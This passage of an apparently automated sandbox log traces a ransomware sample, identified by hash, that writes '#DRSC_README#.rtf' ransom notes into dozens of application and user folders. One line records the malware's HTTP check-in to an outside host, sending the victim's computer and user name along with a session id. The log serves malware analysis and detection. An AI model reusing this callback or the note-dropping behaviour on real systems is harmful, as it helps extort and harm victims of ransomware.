Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\DesktopLearning_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\extensions\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\ru-ru\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\Windows Live\Bici\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bn-BD\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ka\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\1527c705-839a-4832-9118-54d4Bd6a0c89_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ko\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\bg\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\email\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\kn\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Recovery\WindowsRE\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\en-ae\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\en-il\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\http\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\sl-si\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\images\themes\dark\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\or-IN\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ig-NG\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\tr-tr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\default_apps\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\vi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\cmm\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\fr-ma\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\fr-fr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Mac\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Google\Chrome\Application\Dictionaries\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\iq5q997v.default-release\storage\permanent\chrome\idb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\lv\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\zu\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-gb\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\sv\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\include\win32\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\LocalState\ContentManagementSDK\Creatives\310093\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe HTTP URL 35 http://sec.timerz.org/addrecord.php?apikey=drsc_api_key&compuser=LZUKLIOU|Admin&sid=mmQLNZP1fpiDWOAf&phase=0F8D0919EAEB6D73|5216|2GB Process not Found File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\da-dk\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\cs-cz\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.rcp_4.4.0.v20141007-2301\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\es-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\quc\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\eu-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\search-summary\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\hu-hu\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themeless\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Packages\HoloCamera_cw5n1h2txyewy\Settings\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\Links\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\root\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\ti\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\gd\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\de-de\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\fi-fi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files\VideoLAN\VLC\locale\cs\LC_MESSAGES\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\hi\#DRSC_README#.rtf 710c3a5f954b57150f89119074d834fac1def177d73d8adf605378b9c2589ceb.exe File created 